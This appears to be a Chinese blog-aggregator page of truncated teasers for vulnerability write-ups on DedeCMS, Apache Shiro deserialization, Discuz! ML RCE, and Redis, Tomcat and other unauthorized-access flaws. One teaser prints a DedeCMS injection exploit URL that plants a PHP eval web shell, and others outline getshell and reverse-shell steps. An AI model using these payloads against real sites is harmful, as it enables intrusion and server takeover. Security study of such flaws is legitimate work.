转自t00ls 在搞一个DEDE时候,那个是最新版本在上传图片时候被加上了万恶水印,被加上水印之后就这个PP就废了 解决办法: 1、修改后缀为SWF格式,把mediatype ID改成2 (1貌似是图片格式,2是SWF格式 <form action="/member/uploads_edit.php" method="po
转载 精选 2010-12-17 13:23:20
559阅读
一、dedecms找后台1.include/dialog/select_soft.php文件可以爆出DEDECMS后台,以前老板本可以跳过登陆验证直接访问,无需管理员帐号,新版本就直接转向了后台.2.include/dialog/config.php会爆出后台管理路径3.include/dialog/select_soft.php?activepath=/include/FCKeditor
原创 2015-05-07 16:34:04
2330阅读
详细说明:admin/edit_languages.phpelseif ($_REQUEST['act'] == 'edit'){ /* 语言项路径 */
转载 2023-05-19 14:37:16
112阅读
文章目录Apache Shiro550反序列化(CVE-2016-4437)漏洞复现一、漏洞描述二、漏洞原理三、影响版本四、(1)复现过程-使用ysoserial工具复现0.环境说明1.使用Docker起CVE-2016-4437环境2.使用nc监听本机端口3.将Bash反弹ShellCode进行Base64加密4.使用ysoserial.jarJRMP本地监听映射模块5.生成一次性Remem
端口号 漏洞名称21 FTP弱密码22 SSH弱密码139445 smb弱密码23 telnet弱密码3306 mysql弱密码1433 mssql(sql server)弱密码161 snmp默认团体名/弱口令漏洞443 poodle漏洞:ssl3协议禁用3389 ms12-0206379 redis未授权访问873 rsync未授权访问9200 elasticsearch远程命令执行9200
Discuz! ML RCE漏洞 getshell 复现Discuz! ML RCE漏洞 getshell 复现0x00 影响版本Discuz!ML是一个由CodersClub.org创建多语言,集成,功能齐全开源网络平台, 用于构建像“社交网络”这样互联网社区,漏洞版本如下:Discuz! ML V3.2Discuz! ML V3.3Discuz! ML V3.40x01 环境搭建使用ph
转载 2021-05-04 23:42:03
842阅读
2评论
PHP代码 很傻比漏洞    必须开启缓存才能利用     先看代码    book.php    $kd_cachedir = "./cache";     
转载 2011-11-26 15:10:30
602阅读
struts2.1.8.1升级至2.3.28步骤:Apache Struts 2是世界上最流行Java Web服务器框架之一
原创 2023-05-15 10:35:40
88阅读
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download.php?open=1
转载 精选 2013-06-18 17:09:30
9364阅读
===========================================个人收获:1.在Linux系统下上传文件可以尝试通过111.php&#x2e;jpg
转载 2023-08-10 23:20:58
0阅读
问题文件 admin/tag.inc.php95行 eval($tag_code); 未对用户提交执行代码tag_code做安全限制1.jpg1.前台注册会员2.进入会员中心,发布一条求购信息信息标题:随意行业分类:随意产品图片:通过审查元素,修改 post[thumb] value为?file=tag&action=preview&tag_code=file_put_cont
转载 2017-09-14 15:27:36
2299阅读
Hadoop是一个由Apache基金会所开发分布式系统基础架构,由于
原创 2022-11-14 21:58:57
3155阅读
DedeCMS Xss+Csrf Getshell \dede\file_manage_control.php
原创 2022-09-01 17:56:48
117阅读
一、漏洞描述若空灵二、漏洞原理Tomcat支持通过后端部署war文件,因此我terface and the status permission)manager-jmx (jmx
原创 2022-11-14 21:50:11
264阅读
   dede漏洞公认多,接手这个网站也接触了不少,现在就把几种接触到或者了解到漏洞记录下来,让大家可以提高警惕,防止网站被***。1.dede dialog目录下配置文件漏洞    如果有能力同学最好好好研究下这个目录下文件,漏洞太多了,先只说我遇到一处在include/dialog下config.php第35行if($cuserLog
推荐 原创 2013-09-03 15:06:42
4083阅读
3点赞
3评论
近期漏洞挖掘又有小发现
首先感谢尖刀兄弟分享此漏洞,感谢好基友@园长MM。漏洞原文链接http://p2j.cn/?p=357,看到只有利用没有漏洞分析,这里简单说一下漏洞触发流程,大牛勿喷。0x01 漏洞分析漏洞根源在代码注释中出现换行,导致代码执行,流程如下:0x0101 首先,从 index.php第30行跟入。0x0102 do_config_inc.php第37行,跟入这个save_config_fil
转载 精选 2015-01-19 16:50:23
1369阅读
1.redis未授权访问定义  Redis是一个C语言编写基于key-value类型高效数据库。  Redis可以执行一些操作将数据保存到内存之中(这也是为什么效率这么高原因)。  同时redis也可以将内存中数据写入磁盘之中。2.产生redis未授权访问漏洞原因  主要是因为配置不当,导致此漏洞产生,导致恶意数据写入内存或者磁盘之中,造成更大危害  配置不当原因如下:    red
转载 2022-03-06 15:02:00
0阅读
一、Docker介绍Docker 是一个开源引擎可以轻松地为任何应用创建一个轻
原创 2022-11-14 21:58:58
1345阅读
一、 Jupyter Notebook介绍Jupyter Notebook(此前被称为 IPython notebook)
原创 2022-11-14 21:59:52
871阅读
  • 1
  • 2
  • 3
  • 4
  • 5